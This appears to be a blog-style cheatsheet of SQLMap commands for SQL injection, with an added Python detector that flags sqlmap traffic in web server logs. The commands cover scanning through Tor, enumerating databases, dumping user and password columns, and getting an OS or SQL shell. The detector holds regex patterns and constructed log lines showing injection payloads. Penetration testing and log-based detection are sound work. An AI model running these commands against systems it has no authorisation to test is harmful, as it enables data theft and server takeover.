SQLMap Cheatsheet

I thought it might be fun to add another cheatsheet to the collection, this time for the tool SQLMap.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.



Easy Scanning option:

sqlmap -u ""

Scanning through Tor:

sqlmap -u "" --tor --tor-type=SOCKS5

Scanning with a manually set delay (in seconds) for the DBMS response in time-based tests:

sqlmap -u "" --time-sec 15

List all databases at the site:

sqlmap -u "" --dbs

List all tables in a specific database:

sqlmap -u "" -D site_db --tables

Dump the contents of a DB table:

sqlmap -u "" -D site_db -T users --dump

List all columns in a table:

sqlmap -u "" -D site_db -T users --columns

Dump only selected columns:

sqlmap -u "" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials:

sqlmap -u "" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump

Get OS Shell:

sqlmap --dbms=mysql -u "" --os-shell

Get SQL Shell:

sqlmap --dbms=mysql -u "" --sql-shell

These are purely quick and dirty commands you can run with SQLMap. As a growing pentester, I would highly recommend reading the ultimate manual for SQLMap, which can be found here.
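For the defending side, here is an added example (not part of the original cheatsheet or of SQLMap itself) that flags access-log lines showing the kind of traffic the scans above generate: the default sqlmap User-Agent, delay functions used in time-based tests, and metadata queries from database, table and column listing. It assumes the Apache/nginx combined log format; the log lines, IP addresses, path and version string are constructed, and because the User-Agent is client-controlled it is only one signal among the three.

```python
import re
from urllib.parse import unquote_plus

# Default sqlmap User-Agent looks like "sqlmap/<version>#<type> (https://sqlmap.org)".
SQLMAP_UA = re.compile(r"\bsqlmap/\d", re.I)
# Delay functions used by time-based blind payloads (the delay --time-sec tunes).
TIME_BASED = re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", re.I)
# Metadata queries typical of --dbs / --tables / --columns enumeration.
ENUMERATION = re.compile(r"information_schema\.(schemata|tables|columns)", re.I)

# Combined log format: ip - - [time] "METHOD target HTTP/x" status size "referer" "ua"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return the set of indicator names matched by one access-log line."""
    m = LINE.match(line)
    if not m:
        return set()
    # Decode twice so double URL-encoded payloads are still visible.
    target = unquote_plus(unquote_plus(m["target"]))
    hits = set()
    if SQLMAP_UA.search(m["ua"]):
        hits.add("sqlmap-user-agent")
    if TIME_BASED.search(target):
        hits.add("time-based-payload")
    if ENUMERATION.search(target):
        hits.add("schema-enumeration")
    return hits

# Constructed sample lines (documentation IPs, invented path), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1%20AND%20SLEEP%2815%29 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=1%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Map line index -> indicators for every line that matched something."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, sorted(hits))
```

Only GET targets are inspected here; payloads sent with `--data` travel in the request body and need application or WAF logging to be seen.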

